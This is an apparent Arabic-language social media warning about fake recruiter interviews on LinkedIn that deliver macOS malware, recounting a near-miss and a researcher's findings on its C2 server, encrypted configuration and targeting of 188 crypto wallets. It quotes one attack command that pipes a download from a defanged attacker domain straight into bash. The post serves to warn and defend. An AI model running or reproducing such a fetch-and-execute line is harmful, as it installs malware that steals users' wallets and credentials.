كن حذرًا من المقابلات الوظيفية المزيفة. فهي الآن واحدة من أنظف طرق توصيل البرمجيات الخبيثة.

كاد أخي أن يتعرض لها هذا الأسبوع.
الخطوة خطوة:
> "موظف توظيف" يراسله على لينكدإن
> لقد قرأوا سيرته الذاتية فعلاً. يعرفون تقنيته. يحجزون موعد مقابلة حقيقية.
> قبل المكالمة بعدة ساعات: "هل يمكنك مراجعة صفحة منتجنا بسرعة قبل أن نتحدث؟"
> عند زيارة الموقع، يتم تشغيل هذا في الخلفية:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
إذا كتبت كلمة المرور الخاصة بك عندما يطلبها، فالأمر انتهى.
بحث (Darksp33d على Github) عن الملف التنفيذي:
> كل سلسلة تكوين مشفرة باستخدام 570 وظيفة مخصصة فريدة
> بمجرد فكها: خادم C2 كامل، قائمة نقاط النهاية الكاملة، وDSN تتبع أخطاء السنتري التي تعود للمطور تحت أمر قضائي
> 276 معرف امتداد كروم مستهدف، يغطي 188 محفظة عملات مشفرة
> تداخل TTP مع "المقابلة المعدية" لكوريا الشمالية قوي
> 9/64 على virustotal. CrowdStrike، Sophos، Malwarebytes، جميعها فشلت في اكتشافه
موظفو توظيف حقيقيون، سير ذاتية حقيقية، مواعيد مقابلات حقيقية، موقع يبدو حقيقيًا. خط curl واحد يسرق محافظك.
إذا طلب منك "موظف التوظيف" تشغيل أي شيء في طرفية الأوامر، حتى شيء بريء مثل سكربت بناء قبل مقابلة تقنية، أغلق التبويب.